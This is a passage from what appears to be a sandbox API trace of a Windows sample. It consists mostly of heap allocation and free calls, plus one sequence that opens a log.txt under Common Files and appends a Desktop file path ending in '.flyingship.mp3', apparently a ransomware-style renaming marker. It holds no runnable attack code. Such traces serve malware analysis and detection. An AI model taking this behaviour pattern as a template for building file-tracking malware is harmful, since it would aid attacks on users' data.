(HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0076.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0076.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0076.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0076.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0076.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.071] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0076.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0076.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0076.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.071] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0076.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x69d7a8 [0076.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.072] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0076.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0076.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0076.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0076.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0076.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0076.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0076.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0076.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0076.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0076.081] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0076.081] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.081] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.081] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x110) returned 0x6b9e98 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d7a8 | out: hHeap=0x650000) returned 1 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.081] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.081] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0076.081] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0076.081] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.081] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.081] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1b20 | out: hHeap=0x650000) returned 1 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.082] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0076.082] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x771fe8 [0076.082] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.082] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0076.082] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0076.082] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.082] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0076.082] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.082] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0076.082] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.082] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0076.082] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0076.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.083] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0076.083] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x319, lpOverlapped=0x0) returned 1 [0076.083] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0076.083] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x319, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.083] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0076.083] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.083] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0076.083] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.083] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0076.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.flyingship.mp3\r\n", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0076.083] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x46) returned 0x76f100 [0076.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.flyingship.mp3\r\n", cchWideChar=70, lpMultiByteStr=0x76f100, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 70 [0076.083] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.083] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3480 [0076.083] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f100 | out: hHeap=0x650000) returned 1 [0076.083] WriteFile (in: hFile=0x128, lpBuffer=0x6d3480*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x6d3480*, lpNumberOfBytesWritten=0x61eef4*=0x45, lpOverlapped=0x0) returned 1 [0076.084] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0076.084] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.084] CloseHandle (hObject=0x128) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0076.085] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0076.085] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696a48 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0076.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0076.086] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0076.086] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.086] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.086] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0076.086] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0076.086] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0076.086] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0076.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.086] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6908d0 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0076.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0076.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e468 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0076.087] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0076.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0076.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0076.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0076.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 